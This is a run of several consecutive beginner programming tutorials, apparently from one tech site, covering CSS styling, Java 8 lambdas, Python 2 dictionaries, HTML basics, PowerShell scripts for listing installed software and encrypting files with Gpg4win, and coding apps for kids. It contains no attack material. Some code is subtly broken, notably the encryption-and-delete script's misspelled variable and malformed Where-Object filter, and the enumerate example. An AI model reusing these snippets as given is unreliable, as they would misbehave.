a:hover, a:active { background-color: green; color: white; padding: 10px 25px; text-align: center; text-decoration: none; display: inline-block; } By including all four link states, we ensure that the button doesn’t disappear when a user hovers or clicks on it. You can also set different parameters for hover and active links, like changing the button or text color, to add a bit of pop. The background color is set with background-color, and text color with color. Padding defines the size of box — the text is padded by 10px vertically and 25px horizontally. Text-align ensures that the text is displayed in the center of the button, instead of off to one side. Text-decoration, as we saw in the last example, removes the underline. makeuseof link button “display: inline-block” is a bit more complicated. In short, it lets you set the height and width of the object, and ensures that it starts a new line when it’s inserted. 6. Create a Text Box A plain paragraph isn’t very exciting. If you want to highlight your call to action or another element on your page, you might want to throw a border around it. Here’s how to do that with a string of text: p.important { border-style: solid; border-width: 5px; border-color: purple; } This one is pretty straightforward. It creates a solid purple border, 5 pixels wide, around any important-class paragraph. To make a paragraph inherit these properties, just declare it like this: <p class="important">Your important paragraph here.</p> This will work regardless of the size of your paragraph; a single line will get a border the width of the page, one line high, and a longer paragraph will be surrounded by a larger border. There are many different border styles you can apply; instead of “solid,” try “dotted” or “double.” And the width can be “thin,” “medium,” or “thick.” You can even define the thickness of each border individually, like this: border-width: 5px 8px 3px 9px; That results in a top border of 5 pixels, a right border of 8, a bottom of 3, and a left border size of 9 pixels. 7. Center-Align Elements For a very common task, this is a surprisingly unintuitive thing to do with CSS. Once you’ve done it a few times though, it becomes much easier. There are a couple different ways to center things. For a block element (usually an image), we’ll use the margin attribute: .center { display: block; margin: auto; } This ensures that the element is displayed as a block, and that the margin on each side is set automatically (which makes them equal). If you want to center all of the images on a given page, you can even add “margin: auto” to the img tag: img { margin: auto; } To learn why it works this way, check out the CSS box model explanation at W3C. Here’s a short, graphical version: css box model But what if we want to center text? CSS has a specific method of doing that: .centertext { text-align: center; } If we want to use the “centertext” class to center the text in a given paragraph, all we need to do is add that class to the <p> tag: <p class="centertext">This text will be centered.</p> Remembering those different steps, however, is another matter. You might want to bookmark this page. 8. Adjusting Padding The padding of an element specifies how much space should be on each side. For example, if you add 25 pixels of padding to the bottom of an image, the following text will be pushed 25 pixels down. Many elements can have padding, but we’ll use an image for an example here. Let’s say you want every image to have 20 pixels of padding on the left and right sides, and 40 pixels on the top and bottom. There are a number of ways you can do this. The most basic: img { padding-top: 40px; padding-right: 25px; padding-bottom: 40px; padding-left: 25px; } There’s a short hand we can use to present all of this information: img { padding: 40px 25px 40px 25px; } This sets the top, right, bottom, and left paddings to the right number. But we can make it even shorter: img { padding: 40px 25px } When you use only two values, the first value is set for the top and bottom, while the second will be left and right. 9. Highlight Table Rows CSS can do a lot to make your tables look really nice. Adding colors, adjusting borders, and making your table responsive to mobile screens are all easy. We’ll look at just one cool effect here: highlighting table rows when you mouse over them. Here’s the code you’ll need for that: tr:hover { background-color: #ddd; } Now whenever you mouse over a table cell, that row will change color. To see some of the other cool things you can do, check out the W3C page on fancy CSS tables. fancy css table 10. Shifting Images Between Transparent and Opaque CSS can help you do cool things with images, too. For example, it can display images at less than full opacity (they appear slightly “whited out”) and bring them to full opacity when you mouse over them. Here’s how we’ll do that: img { opacity: 0.5; filter: alpha(opacity=50); } The “filter” attribute does the same thing as “opacity,” but Internet Explorer 8 and earlier don’t recognize the opacity measurement, so it’s a good idea to include it. Now that the images are slightly transparent, we’ll bring them to fully opaque on a mouseover: img:hover { opacity: 1.0; filter: alpha(opacity=100); } Become a CSS Master With these CSS code examples, you should have a much better idea of how CSS works. Once you’ve gone through all of them, you’ll notice a number of patterns that you can apply to further CSS code. And that’s when you know you’ve really started becoming a CSS master. And if all of this sounds too complicated, remember that you just grab some CSS templates and modify them. What do you do with CSS? Which examples would you like to see in the future? Share your thoughts in the comments below! A Quick Introduction To Java 8 Lambdas If you’re a Java programmer and you’re interested in learning more about Java 8 lambdas, in this article we’re going to take a closer look at lambda syntax and usage. A lambda expression in Java is a concise way to express a method of a class in an expression. It has a list of parameters and a body. The body can be a single expression or a block. It is commonly used where an implementation of an interface is required. This need usually arises when an interface is required as the argument to invoke a method. Some Simple Lambda Expressions Let us look at some simple examples of lambda expressions. The following is a lambda expression which accepts two numbers x and y and computes the sum. (int x,int y) -> x + y; Drop the parameter types for a more concise representation: (x, y) -> x + y; Define a function which accepts no parameters: () -> 404; The following is valid too, which accepts no parameters and returns nothing: () -> {} No need for parantheses enclosing parameters for a single parameter: x -> x + 1 More complex code blocks are also possible. The following lambda accepts a single line parameter and does some processing on it. Note that the type of the parameter is inferred from the surrounding context: line -> { String[] x = pattern.split(line); return new Player(Integer.parseInt(x[0]), x[1], x[2], x[3], Integer.parseInt(x[4])); } Clean and Concise Coding Using lambda expressions helps make your code clean and concise. To assist in this, Java 8 classes make extensive use of lambdas. Looping Over a List or a Set Collection classes such as List, Set, Queue, and such implement the Iterable interface which makes looping over the elements much easier. Declare a list of names. List<String> names = Arrays.asList("Joe", "Jack", "James", "Albert"); Loop over the list without lambda: for (String name : names) { System.out.println(name); } Using lambda, the above loop can be written as: names.forEach(name -> System.out.println(name)); With Java 8 method references, the above can be written even more concisely as: names.forEach(System.out::println); Looping Over a Map A Map is a mapping of keys to values. Looping over a map involves looping over each of the (key, value) mapping. Compare how you can use lambdas for this situtation. First define a map: Map<String,Integer> map = new HashMap<>(); map.put("Atlanta, Georgia", 110); map.put("Austin, Texas", 115); map.put("Baltimore, Maryland", 105); map.put("Birmingham, Alabama", 99); map.put("Boston, Massachusetts", 98); You can loop over this map in the traditional way: for (Map.Entry<String,Integer> e : map.entrySet()) { System.out.println(e.getKey() + " => " + e.getValue()); } Here is how you can do the same thing in a quick and concise way using lambdas: map.forEach((k, v) -> System.out.println(k + " => " + v)); Functional Interfaces What is the return type of a lambda expression? In other words, what is the type of X in the following statement? X x = a -> a + 1; The return type of a lambda expression is a functional interface – an interface with a single abstract method. You can assign a lambda expression to an interface with a compatible abstract method. Some examples below. Creating a Multi-Threaded Task Consider creating a task for execution in a separate thread — you are required to define the task as a Runnable interface and implement the run() method. Here Runnable is a functional interface. class MyTask implements Runnable { ... public void run() { // implement your task here System.out.println("Running in a separate thread now."); } ... } You can then create an instance of the MyTask class and use it to start a new thread of execution. MyTask task = new MyTask(); Thread thread = new Thread(task); thread.start(); Using a lambda, the process of creating a Runnable becomes much easier. The task definition above can be rewritten as: Runnable task = () -> System.out.println("Running in a separate thread now."); Or even: Thread thread = new Thread(() -> System.out.println("Running in a separate thread now.")); thread.start(); Comparison Using a Comparator The Comparator is a functional interface for comparing objects of a given type. It defines a single abstract method called compare() which can be defined using a lambda expression. Here is a lambda expression creating a Comparator used to compare strings case-insensitively. Comparator<String> cmp = (x, y) -> x.compareToIgnoreCase(y); Once an instance of the Comparator functional interface has been created, it can be re-used as required. Here, we sort a list of strings in ascending order. List<String> names = Arrays.asList("Joe", "Jack", "James", "Albert"); Collections.sort(names, cmp); names.forEach(System.out::println); // prints Albert Jack James Joe The list above is sorted in place. We can now search it using the binarySearch() method as follows: System.out.println("search(Joe):" + Collections.binarySearch(names, "Joe", cmp)); # prints search(Joe):3 Computing maximum and minimum from a list is also easy using lambdas. Define some data: List<Integer> temps = Arrays.asList(110, 115, 105, 99, 98, 54, 109, 84, 81, 66, 72, 135, 115, 75, 82, 90, 88); Use a lambda expression to define the comparator: Comparator<Integer> cmpTemp = (x, y) -> Integer.compare(x, y); And print the maximum and minimum: System.out.println("------ Max/Min ------"); System.out.println(Collections.max(temps, cmpTemp) + "/" + Collections.min(temps, cmpTemp)); Use in GUI Programming Lambda expressions are also extremely useful in GUI programming to implement event handlers. Here is an example of using a button click handler. JButton button = new JButton("Click Me"); button.addActionListener(e -> System.out.println("Button clicked!")); And that was a quick look at using lambdas in Java 8. Have lambdas made your life easier since Java 8? Please explain in the comments below. How To Auto-generate A List Of Installed Programs On Windows You probably have several dozen pieces of software installed on your computer. Aside from tools you use every day like your web browser, it’s easy to forget about programs you don’t use often. This can cause problems whenever you’re resetting your computer or buying a new machine, as you won’t remember which software you need to reinstall. Thankfully, Windows makes it easy to generate a list of all the software you have installed. It’s made possible by PowerShell, but don’t be scared if you’ve never used it before: you only need a few easy commands. Go ahead and open up a PowerShell window by typing Powershell into the Start Menu. Once there, paste in this line to generate a list of all your software, including its publisher and the date you installed it: Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table –AutoSize Of course, this list alone doesn’t do you much good. To send this information to a text file, append the line below, changing the file path to your username: > C:\Users\USERNAME\Desktop\InstalledProgramsList.txt Altogether, using the command below (make sure you change USERNAME to your own Windows username) will generate a list of your installed software and export it to a file on your desktop called InstalledProgramsList.txt: Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table –AutoSize > C:\Users\USERNAME\Desktop\InstalledProgramsList.txt To easily find out the different software you have installed on different systems, run this command on two machines and paste the resulting text into a text comparison website. Once you’re done, don’t forget to save this file to a flash drive, cloud storage, or other external media for safekeeping. If you wipe your computer, you’ll erase this file along with it! Interested in what PowerShell can do as opposed to the Command Prompt? Have a look at their differences. Do you find it useful to keep a list of installed software? Let us know if you’ll use this command soon down in the comments! Image Credit: racorn via Shutterstock.com Automate File Encryption In Windows With This Powershell Script File encryption and file decryption can be a bit of work. However, using a PowerShell extension, you can slim down the process to a one-line command. To do this, we need to install Gpg4win and a Powershell module. Using scripts, we can automate the file encryption and decryption process. Let’s take a look at how to encrypt files in Windows 10 automatically with a script. The Prerequisites: Installs, Modules, and Certs You’ll want to have the GPG4Win tools installed and configured before you begin. Head over to the project page and download the latest version. (If you need some guidance installing and configuring the tool, use this PDF guide.) You are going to use the symmetric cipher function of GPG4Win in this module. This Powershell module handles file encryption using a passphrase rather than a keypair. The strength of your encryption depends on the strength of your passphrase. You should make sure to choose something complex. Generate it using LastPass or another password manager. Finally, complete the installation and move on to the Powershell Module. automate file encryption windows powershell Powershell Modules are packaged collections of functions. They use the PSM1 file format. You save these files in your profile’s Modules directory. Then, add the Module to your session/script using Import-Module. All the module’s cmdlets are available. As you advance your Powershell skills, you can even create your own modules. To install the file Encryption module, download it from TechNet. Next, you need to copy it into one of the Modules directories. If you want to install it for just yourself, copy it into the PowershellModules in your user folder. Copy this into Explorer for a shortcut: %UserProfile%\Documents\WindowsPowerShell\Modules If you want to install the module for all users, use the Program Files\Windows PowerShell\Modules folder. Paste this into Explorer for a shortcut: %ProgramFiles%\Windows PowerShell\Modules Create a new folder named GNUPG in the Modules directory and paste the PSM1 file into it. automate file encryption windows powershell You’ll need to import the module each time using: Import-Module GnuPG. However, you may need to adjust your Execution policy to Unrestricted. Do this by running the cmdlet Set-ExecutionPolicy RemoteSigned. automate file encryption windows powershell Since you downloaded this Module, you still need to mark it as a local file. Right-click the file and select, Properties. Next, in the dialog, click Unblock. Confirm your action in the UAC dialog, and you’re set to use the module. Working With the Cmdlets Skip the first Cmdlet, which is used to install GPG4Win. You should have already completed this step. If not, you can use this cmdlet to install and configure the program. The cmdlet downloads it to a folder you choose and runs the installer. The other two are complementary: Add-Encryption and Remove-Encryption. Both of these take three parameters. automate file encryption windows powershell The first is a directory, passed as -FolderPath. The module will step through every file in a directory to apply or remove file encryption. You wouldn’t want to point it at your Documents folder. You would want to create a couple of subfolders for working with this script. If you look at the source code for the Module, it’s using Get-ChildItem to get everything in the directory. The decryption function limits the search to files ending in .GPG. automate file encryption windows powershell The next parameter is the passphrase used for the file encryption: -Password. Make sure that this is complex, as it is the protection for your file. The function steps through each of the files with a ForEach loop. The file and passphrase combine as arguments in Start-Process for GPG4Win. The final parameter, -GPGPath is not mandatory. It is set to the default install location for GPG4Win. If you have it on another drive, you can update it using this parameter. It changes the target for the Start-Process. Writing the Script Now it’s time to automate the process. This script will encrypt the files in a directory. Move the decrypted files to a new directory. The script will delete the original file. You start your script with some prep. First, import the module using Import-Module GnuPG. You need to set up a couple of variables. The first variable $EncryptionTarget is your target folder. (In the example, an environment variable is used to point to the current user’s document folder.) Set the second variable as your passphrase. This step makes it easier to change it later. Import-Module GnuPG $EncryptionTarget = "$($env:USERPROFILE)\Documents\Files-ToEncrypt" $Passphrase = "MakeAVeryLongSecurePhrase" Add-Encryption $EncryptionTarget -Password $Passphrase Start-Sleep -Seconds 60 $EcnryptedFiles = Get-ChildItem $EncryptionTarget | Where-Object $_.Name -like "*.gpg" foreach ($gpg in $EcnryptedFiles){ Move-Item -Path $gpg.FullName -Destination "$($env:USERPROFILE)\Documents\$($gpg.Name)" } $UnEncryptedFiles = Get-ChildItem $EncryptionTarget | Where-Object $_.Name -notlike "*.gpg" foreach ($nongpg in $UnEcnryptedFiles){ Remove-Item -Path $nongpg.FullName -Confirm $false } Those variables go to Add-Encryption as parameters. You use a Start-Sleep to give the file encryption time to complete. The example uses three minutes. You can alter it based on the size and number of files you are working with. You get the .GPG files by combining Get-ChildItem with Where-Object. Using a ForEach loop, each one of those files is copied to a new directory. We repeat these steps, but switching the -like for -notlike. A second ForEach loop cleans up the original files. Setting the Recurring Task You have the script, now you need to create a scheduled task. Open Task Scheduler and click Create Task. automate file encryption windows powershell Name it something like AutoEncrypt. If you only want the task to run when you are logged in, just leave the default. If you set it to run regardless, it can only access local directories. However, if your destination is on a remote machine, you need to store your password for the job to run. You may want to set up a secondary account to protect the security of your main account. automate file encryption windows powershell Click on the Triggers tab and setting up the conditions. Next, click on New to pull up the scheduling window. You can leave the trigger settings set to the default. Click the checkbox next to Repeat Task Every and set it to 5 Minutes. You can choose to run this less often if your need isn’t urgent. In the dropdown next to for the duration of: select Indefinitely. Click OK to go back to the Create Task window. automate file encryption windows powershell On the Actions tab, click New. In the popup, put the path to Powershell in the Program box: %SystemRoot%/system32/Windows PowerShell/v1.0/powershell.exe In the arguments box put ./ and the path to your script. Click OK twice and your script is set to run as a Scheduled task. Some Security Concerns and Other Ideas Be aware that you have the passcode to decrypt the files on the same machine where you are storing them. These types of file encryptions are more for encrypting a file before you send it, or store it on another machine. (If you want a locked down file system, use Full Disk Encryption.) You can set up a similar task to do the same with decryption. Do you have a project that needs a quick and dirty file encryption script? Let us know in the comments. Python Dictionary: How You Can Use It To Write Better Code A python dictionary is a data structure similar to an associative array found in other programming languages. An array or a list indexes elements by position. A dictionary, on the other hand, indexes elements by keys which can be strings. Think of a dictionary as unordered sets of key-value pairs. a python dictionary key-value pairs In this article, we introduce you to working with the python dictionary. Creating a Dictionary There are several ways of creating a python dictionary. The simplest uses brace initialization, with a syntax reminiscent of JSON. users = {'firstname': 'John', 'lastname': 'Smith', 'age': 27} You can use numbers too as the keys. However, be careful using floating point numbers as keys, since the computer stores these as approximations. rain_percent = { 1980: '17%', 1981: '15%', 1982: '10%'} print rain_percent print rain_percent[1980] # prints {1980: '17%', 1981: '15%', 1982: '10%'} 17% Specifying Key-Value Pairs You can also create and initialize a dictionary using name value pairs as keyword arguments to the dict() constructor. population = dict(California=37253956, Colorado=5029196, Connecticut=3574097, Delaware=897934) print population # prints {'Connecticut': 3574097, 'Delaware': 897934, 'California': 37253956, 'Colorado': 5029196} Array of Key-Value Tuples Yet another way of creating a dictionary is to use an array of key-value tuples. Here is the same example as above. pairs = [('California', 37253956), ('Colorado', 5029196), ('Connecticut', 3574097), ('Delaware', 897934)] population = dict(pairs) print population # prints {'Connecticut': 3574097, 'Delaware': 897934, 'California': 37253956, 'Colorado': 5029196} Dict Comprehension Dict comprehension provides a cool syntax to initialize a dict if you can compute the values based on the keys. The following initializes a dict of numbers and square values for a range of numbers. print {x: x**2 for x in xrange(10, 20)} # prints {10: 100, 11: 121, 12: 144, 13: 169, 14: 196, 15: 225, 16: 256, 17: 289, 18: 324, 19: 361} How does it work? The latter part (for x in xrange(10, 20)) returns a range of numbers in the specified range. The dict comprehension part ({x: x**2 ..}) loops over this range and initializes the dictionary. Working With a Python Dictionary What can you do with dictionaries once you have created them? Well, you can access elements, update values, delete elements, etc. Accessing Python Dictionary Elements Access an element of a dict using the key within brackets, just like you would an array or a list. print population['Delaware'] # prints 897934 If the key is a number, you don’t need the quotes. The expression then appears to look like a list or array indexing. print rain_percent[1980] # prints 17% The type of the key when accessing it must match what is stored in the Python dictionary. The following causes an error since the stored keys are numbers while the access key is a string. x = '1980' print rain_percent[x] # results in 1 x = '1980' ----> 2 print rain_percent[x] KeyError: '1980' Accessing a non-existent key is an error. rain_percent = { 1980: '17%', 1981: '15%', 1982: '10%'} print rain_percent[1983] # prints 1 rain_percent = { 1980: '17%', 1981: '15%', 1982: '10%'} ----> 2 print rain_percent[1983] KeyError: 1983 To access a key and provide a default value if the mapping does not exist, use the get() method with default value as the second argument. print rain_percent.get(1985, '0%') # prints 0% Checking for Existence What if you want to check for the presence of a key without actually attempting to access it (and possibly encountering a KeyError as above)? You can use the in keyword in the form key in dct which returns a boolean. print 1980 in rain_percent print '1980' in rain_percent # prints True False Reverse the condition (i.e. ensure that the key is not present in the Python dictionary) using the form key not in dct. This is equivalent to the standard python negation not key in dct. print 1980 not in rain_percent print 1985 not in rain_percent # prints False True Modifying Elements Change the value by assigning to the required key. users = {'firstname': 'John', 'lastname': 'Smith', 'age': 27} users['age'] = 29 print users # prints {'lastname': 'Smith', 'age': 29, 'firstname': 'John'} Use the same syntax to add a new mapping to the Python dictionary. users['dob'] = '15-sep-1971' print users # prints {'dob': '15-sep-1971', 'lastname': 'Smith', 'age': 29, 'firstname': 'John'} Update multiple elements of a dictionary in one shot using the update() method. users = {'firstname': 'John', 'lastname': 'Smith', 'age': 27} users.update({'age': 29, 'dob': '15-sep-1971'}) print users # prints {'dob': '15-sep-1971', 'lastname': 'Smith', 'age': 29, 'firstname': 'John'} Set a default value for a key using setdefault(). This method sets the value for the key if the mapping does not exist. It returns the current value. # does not change current value print users.setdefault('firstname', 'Jane') # prints John # sets value print users.setdefault('city', 'NY') # prints NY # Final value print users # prints {'lastname': 'Smith', 'age': 27, 'firstname': 'John', 'city': 'NY'} Deleting elements Delete mappings in the dictionary by using the del operator. This operator does not return anything. You will encounter a KeyError if the key does not exist in the dictionary. users = {'firstname': 'John', 'lastname': 'Smith', 'age': 27} del users['age'] print users # prints {'lastname': 'Smith', 'firstname': 'John'} Use the pop() method instead, when you want the deleted value back. users = {'firstname': 'John', 'lastname': 'Smith', 'age': 27} print users.pop('age') print users # prints 27 {'lastname': 'Smith', 'firstname': 'John'} What if you want to delete a key if it exists, without causing an error if it doesn’t? You can use pop() and specify None for second argument as follows: users = {'firstname': 'John', 'lastname': 'Smith', 'age': 27} users.pop('foo', None) print users # prints {'lastname': 'Smith', 'age': 27, 'firstname': 'John'} And here is a one-liner to delete a bunch of keys from a dictionary without causing an error on non-existent keys. users = {'firstname': 'John', 'lastname': 'Smith', 'age': 27, 'dob': '15-sep-1971'} map(lambda x : users.pop(x, None),['age', 'foo', 'dob']) print users Want to delete all keys from a dictionary? Use the clear() method. users = {'firstname': 'John', 'lastname': 'Smith', 'age': 27} users.clear() print users # prints {} Looping With Python Dictionaries Python provides many methods for looping over the entries of a dictionary. Pick one to suit your need. Looping Over Keys • The simplest method for processing keys (and possibly values) in sequence uses a loop of the form: users = {'firstname': 'John', 'lastname': 'Smith', 'age': 27} for k in users: print k, '=>', users[k] # prints lastname => Smith age => 27 firstname => John • Using the method iterkeys() works exactly the same as above. Take your pick as to which form you want to use. users = {'firstname': 'John', 'lastname': 'Smith', 'age': 27} for k in users.iterkeys(): print k, '=>', users[k] # prints lastname => Smith age => 27 firstname => John • A third method to retrieve and process keys in a loop involves using the built-in function iter(). users = {'firstname': 'John', 'lastname': 'Smith', 'age': 27} for k in iter(users): print k, '=>', users[k] # prints lastname => Smith age => 27 firstname => John • When you need the index of the key being processed, use the enumerate() built-in function as shown. users = {'firstname': 'John', 'lastname': 'Smith', 'age': 27} for index, key in enumerate(users): print index, key, '=>', users[k] # prints 0 lastname => John 1 age => John 2 firstname => John Looping Over Key-Value Pairs • When you want to retrieve each key-value pair with a single call, use iteritems(). users = {'firstname': 'John', 'lastname': 'Smith', 'age': 27} for k, v in users.iteritems(): print k, '=>', v # prints lastname => Smith age => 27 firstname => John Iterating Over Values • The method itervalues() can be used to iterate over all the values in the dictionary. Though this method looks similar to a loop using values(), it is more efficient since it does not extract all the values at once. users = {'firstname': 'John', 'lastname': 'Smith', 'age': 27} for value in users.itervalues(): print value # prints Smith 27 John Extracting Arrays The following methods describe extracting various Python dictionary information in an array form. The resulting array can be looped over using normal python constructs. However, keep in mind that the returned array can be large depending on the size of the dictionary. So it might be more expensive (memory-wise) to process these arrays than using the iterator methods above. One case where it is acceptable to work with these arrays is when you need to delete items from the dictionary as you encounter undesirable elements. Working with an iterator while modifying the dictionary may cause a RuntimeError. • The method items() returns an array of key-value tuples. You can iterate over these key-value pairs as shown: users = {'firstname': 'John', 'lastname': 'Smith', 'age': 27} for k, v in users.items(): print k, '=>', v # prints lastname => Smith age => 27 firstname => John • Retrieve all the keys in the dictionary using the method keys(). users = {'firstname': 'John', 'lastname': 'Smith', 'age': 27} print users.keys() # prints ['lastname', 'age', 'firstname'] Use the returned array to loop over the keys. for k in users.keys(): print k, '=>', users[k] # prints lastname => Smith age => 27 firstname => John • In a similar way, use the method values() to retrieve all the values in the dictionary. for value in users.values(): print value # prints Smith 27 John How Do You Use Python Dictionaries? We have tried to cover the most common use cases for python dictionaries in this article. Make sure to check out all of our other Python articles for even more Python tipsIf you have other use cases you feel should be included, please let us know in the comments below! Image Credits: viper345/Shutterstock The Essential HTML FAQ You Should Bookmark Advertisement HTML has been around for a long time now, so it’s about time you learned the basics. What is it, how it works, and how to write some common elements in HTML. Before starting, make sure your read our guide to free online HTML editors 5 Best Free Online HTML Editors to Test Your Code 5 Best Free Online HTML Editors to Test Your Code For times when you just want to fiddle around with a small snippet of HTML so you can tweak it to your liking, an online HTML editor will serve you better. Read More and the best websites for quality HTML examples 8 Best Websites For Quality HTML Coding Examples 8 Best Websites For Quality HTML Coding Examples There are some awesome websites that offer well-designed and useful HTML coding examples and tutorials. Here are eight of our favorites. Read More . What Is HTML? HTML is the language used to construct web pages. HTML stands for Hypertext Markup Language and is simple a set of instructions for your web browser. Using these instructions, your browser displays what a web page should look like. It’s important to understand that it’s a markup language, not a programming language. Programming languages allow you to solve problems, such as math equations, manipulating data, or moving a video game character. You’re unable to write any logic in HTML. It is only concerned with layout. What Does HTML Look Like? HTML consists of several elements known as “tags”. Tags are instructions for styling a specific part of your web page. Going back to construction, HTML is the plans, and tags are specific features such as windows or doors. Here’s what a very basic web page looks like in HTML: <html> <head> <title>MUO Website</title> </head> <body> </body> </html> Tags in HTML are pre-defined, and specify common features like images, links to other webpages, buttons, and more. The vast majority of tags have to be open and closed. This simply defines some feature, with text, images, or other tags inside it, and then ends the definition. Thinking back to houses, opening the tag is like saying “start the window here”, and closing the tag is like saying “here’s where the window ends”. HTML tags won’t actually show up on your website. Your browser follows the instruction, but never shows it to any visitors. It’s not secret, however. Anyone can look at your HTML once you publish your web pages. While there is a large number of different HTML tags, you don’t have to learn them all before you can code a website. Today you’ll learn how to write some common tags, and what they can be used for. What Are HTML Tag Attributes? One last thing to know about tags is attributes. Attributes define special features of tags. If tags are windows and doors, then attributes specify specific building details. This could be the width and height of the frame, whether the window opens, or if the door has a lock. Attributes are included inside the opening tag, like this: <p width="123" height="567"></p> You can’t just make up your own tags or attributes. Attributes and tags are pre-defined by the World Wide Web Consortium (W3C). What Is HTML5? HTML5 is the latest version of HTML. It contains several new tags, attributes, and features. As HTML is a set of instructions, different web browsers sometimes interpret it differently. One browser might decide that windows and doors should be painted black unless you say otherwise. everything know about html While browsers have finally started to become quite consistent with each other, you can still get caught out sometimes with very new features. Perhaps Google Chrome has implemented a new tag, but Microsoft’s internet Explorer has not yet. For the most part, your web pages will look the same across all the major browsers, but it’s still worth having a quick test before your publish anything, especially if you’re using newer tags, which may not be supported by all browsers yet. If you’d like to know more about HTML5, then take a look at our HTML5 getting started guide Get Started With HTML5 Get Started With HTML5 You’ve heard of HTML5. Everybody is using it. It’s being heralded as the savior of the Internet, allowing people to create rich, engaging web pages without resorting to using Flash and Shockwave. Read More . How to Comment Out HTML Like many other languages, markup or programming, HTML has the ability to “comment out” blocks of markup. A comment is something that is ignored by the browser. This may be a note to remind yourself about what this particular piece of your website does. By commenting out markup, you are instructing the browser to ignore one or more tags. This may be useful to remove functionality, or to hide a piece of your website without deleting the code. When a web browser sees a comment, it understands it as “don’t use these instructions until I say otherwise”. Comments consist of an “opening” comment, and a “closing” comment—just like tags. Here’s an example: <!-- Don't forget to add the XYZ here! --> <p width="123" height="567"></p> Commenting out code is done exactly the same way: <!-- <p width="123" height="567"></p> --> Rather than a message, put your markup between the comment tags. How to Insert Images in HTML Inserting images into your HTML is done with the image tag: <img src="MUO_logo.jpg" alt="MakeUseOf Logo"> Notice how the tag name is called img, and there are two attributes. The src attribute specifies where to find the image, and the alt tag is an alternative text description, in case the image cannot be loaded for any reason. The image tag does not need closing, unlike most other tags. How to Change Font in HTML Fonts can be changed using the font tag and the face attribute: <font face="arial">MUO Arial Text</font> everything know about html Font size can be easily changed using the size attribute: <font size="12">MUO Big Text</font> everything know about html If you’d like to change the font color, this can be easily done with the color attribute: <font color="red">MUO Red Text</font> everything know about html These attributes are unique to the font tag. If you wish to use another tag, you can nest tags, by placing one inside the other: <p><font color="red">MUO Red Text</font></p> How to Add a Link in HTML Links can be added using the a tag: <a href="">MakeUseOf.com</a> The href attribute is the destination of your link. How to Make a Table in HTML HTML tables involve nesting several different tags. You’ll need to start with a table tag: <table> </table> Now add some rows using the tr tag: <table> <tr> </tr> <tr> </tr> <tr> </tr> </table> Finally, use the td tag to create your table cells, which will also create the columns: <table> <tr> <td></td> <td></td> <td></td> </tr> <tr> <td></td> <td></td> <td></td> </tr> <tr> <td></td> <td></td> <td></td> </tr> </table> It’s possible to go overboard and go quite wild with your table layout, but it’s usually best to keep things simple if possible. In the past, tables were used to structure a web page, but this practice is dated and looks terrible. Keep tables simply for relaying data to the reader. Using CSS With HTML These examples have covered the basics, but if you want to get really creative, you’ll need to use CSS. Cascading Style Sheets allow you much greater control over your website design, and allow you to re-use quite a lot of code between different parts of your website. While we have tutorials on learning CSS 5 Baby Steps to Learning CSS and Becoming a Kick-Ass CSS Sorcerer 5 Baby Steps to Learning CSS and Becoming a Kick-Ass CSS Sorcerer CSS is the single most important change webpages have seen in the last decade, and it paved the way for the separation of style and content. In the modern way, XHTML defines the semantic structure… Read More and quick CSS examples 10 Simple CSS Code Examples You Can Learn in 10 Minutes 10 Simple CSS Code Examples You Can Learn in 10 Minutes We’ll go over how to create an inline stylesheet so you can practice your CSS skills. Then we’ll move onto 10 basic CSS examples. From there, your imagination is the limit! Read More , there’s still some setup you can do in HTML. If you’d like to write CSS alongside your HTML, you can use the style attribute. This attribute simply applies the CSS to the tag it’s used on: <p ></p> While this way works well, you’ll find it hard work to maintain if you have a lot of markup which requires similar styling. The better way is to use the style tag, placed inside the head tag. Here you can define CSS for your whole page: <html> <head> <style type="text/css"> MANY CSS RULES </style> </head> </html> The style tag has an attribute of text/css. This is required to let your browser know the exact style to expect in the tag. The third and final way of using CSS is through an external file, using the link tag. This links your HTML to CSS stored in its own file, which is great if you have a large amount of it: <link rel="stylesheet" type="text/css" href="muostyle.css"> There are several attributes in use here. The rel attribute declares your link as a stylesheet. The type of “text/css” is once again defined in the type attribute, and the href attribute is where to find the external file. How Do You Make a Website With HTML? As you’ve seen, HTML really isn’t that bad, is it? Using a few simple tags and attributes, you can quickly assemble a web page, even if you’ve never written HTML before! If you’re looking to write a complete website, then make sure you take a look at our beginner’s guide to making a website How to Make a Website: For Beginners How to Make a Website: For Beginners Today I’ll be guiding you through the process of making a complete website from scratch. Don’t worry if this sounds difficult. I’ll guide you through it every step of the way. Read More . 7 Best Coding Apps For Kids To Learn Programming Young children learn languages better. While older brains may be more efficient, younger brains are increasingly malleable. Like spoken languages, it’s an excellent idea for kids to foray into programming languages. BBC’s micro:bit hardware teaches kids coding and the Kano is a DIY computer for kids to learn programming. But just as old and young brains differ in retention, so too do learning methods. Coding apps offer ample opportunities to teach children programming. It’s a fun, controlled environment. Rather than send children to a coding boot camp, check out these five best coding apps for kids to learn programming. 1. Kodable (Free/Paid, Web/iOS) Kodable-screenshot Image Credit: iTunes Kodable’s tagline reads “programming for kids, made with love.” Its easy lessons target kindergarten to fifth graders. While the K-3 curriculum is mostly foundational, fourth and fifth grade learning shifts to a focused set of topics. Kodable adheres to programming standards which teach JavaScript. Since JavaScript is an excellent language for beginners, the fundamentals Kodable enforces foster fantastic programming skills. Plus, progression through lessons remains fun. Games arrive as a set of challenges like navigating a maze. But Kodable doesn’t keep programming concepts too simple. Rather, Kodable even includes notions including looping and branching. Largely Kodable presents if/then decisions to initially present the concept of programming. Moreover, Kodable makes learning JavaScript fun by using gamification. Overall, Kodable is a solid entry-level means for kids to learn programming. Why it’s great: Kodable is free and web-based, and introduces basic programming concepts like looping and branching. 2. Daisy the Dinosaur (Free, iOS) Fact: dinosaurs are awesome. As a kid, my favorite chicken nuggets were the dinosaur-shaped ones. Adding dinosaurs is a recipe for excellence. Further proving this point, Daisy the Dino is one of the best coding apps for kids. Mini-games teach children programming basics. For instance, a loop-deloop challenge encourages kids to use word commands to make Daisy perform various moves. But there’s a catch: you’re limited to using the spin command once. A hint suggests nesting the spin command inside the repeat five command. Daisy the Dinosaur isn’t just one of the best coding apps for kids to learn programming because there’s a dinosaur. Although the dino protagonist certainly helps, it’s more the spectacular focus on coding and its challenges. Furthermore, Daisy the Dinosaur doesn’t seem tech-oriented. On the surface it’s a simple word and puzzle solving game. While Daisy the Dinosaur might be a bit short, it’s free and fundamentally sound. Why it’s great: Daisy the 